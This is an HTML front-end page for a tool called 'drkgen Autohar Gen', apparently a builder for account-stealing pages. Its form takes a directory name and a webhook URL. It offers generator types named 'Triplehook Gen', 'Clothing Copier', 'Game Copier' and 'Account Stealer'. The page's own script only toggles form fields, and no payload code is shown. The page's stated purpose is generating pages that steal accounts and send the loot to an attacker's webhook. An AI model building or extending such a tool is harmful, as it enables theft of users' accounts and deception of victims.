<!DOCTYPE html>
<html lang="en">

<head>
    <style>
        body,
        html {
            background: rgb(24, 24, 28) !important;
        }
    </style>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=etge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Create</title>
    <!-- CSS / Bootstrap -->
    <link href="../../controlPage/new/assets/css/imports.css" rel="stylesheet">
    <!-- SNACKBAR -->
    <link rel="stylesheet" href="../../controlPage/new/assets/css/snackbar.css" />
    <script src="../../controlPage/new/assets/js/snackbar.js"></script>
    <style>
        .swal2-container {
            z-index: 20000 !important;
        }
    </style>
</head>

<body>
    <section id="login" class="form">
        <div class="container h-100">
            <div class="row justify-content-center align-items-center h-100">
                <div class="col-md-10 col-lg-5">
                    <div class="login-box" data-aos="fade-up" data-aos-duration="1500">
                        <center>
                            <h2>drkgen</h2>
                        </center>
                        <center>
                            <h2>Autohar Gen</h2>
                        </center>
                        <form method="post" id="login-form">

                            <div class="form-input-icon mb-3 mt-4"> <i class="fas fa-folder"></i>
                                <input class="auth-input" type="text" placeholder="Directory Name" name="dir"> </div>

                            <div class="form-input-icon mb-3 mt-4"> <i class="fas fa-gear"></i>
                                <input class="auth-input" type="text" placeholder="Webhook" name="web"> </div>

                            <div id="nm" class="form-input-icon mb-3 mt-4" style="display: none;">
                                <i class="fas fa-gear"></i>
                                <input class="auth-input" type="text" placeholder="name" name="name">
                            </div>

                            <div id="image" class="form-input-icon mb-3 mt-4" style="display: none;">
                                <i class="fas fa-gear"></i>
                                <input class="auth-input" type="text" placeholder="thumbnail" name="img">
                            </div>
                            <select name="type" class="form-control" id="triplehook" onchange="AutoHar()">
<option value="tg">Triplehook Gen (NEW, OP)</option> 
<option value="cc">Clothing Copier (NEW, OP)</option> 
<option value="fb">Follow Bot (NEW, OP)</option> 
<option value="gc">Game Copier (NEW, OP)</option>
<option value="as">Account Stealer (NEW, OP)</option> 
</select>
                            <button type="submit" class="button primary d-block mt-3 w-100" style="color:black">Generate</button>
                        </form>
                        <!-- ~LOGIN FORM -->
                    </div>
                </div>
            </div>
        </div>
        <div class="overlay-top-right"></div>
        <div class="overlay-bottom-right"></div>
        <div class="overlay-bottom-left"></div>
    </section>
    <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    <script>
    </script>
    <script src="js/jquery-3.3.1.min.js"></script>
    <script src="https://kit.fontawesome.com/44623006da.js" crossorigin="anonymous"></script>
    <script src="../../controlPage/new/assets/js/bootstrap.js"></script>
    <script src="../../controlPage/new/assets/js/core.js"></script>
    <script>
        function AutoHar() {
            var tg = document.getElementById("triplehook");
            var nm = document.getElementById("nm");
            var image = document.getElementById("image");

            if (tg.value === "tg") {
                nm.style.display = "block";
                image.style.display = "block";
            } else {
                nm.style.display = "none";
                image.style.display = "none";
            }
        }

        window.onload = function() {
            AutoHar();
        };
    </script>
</body>

</html>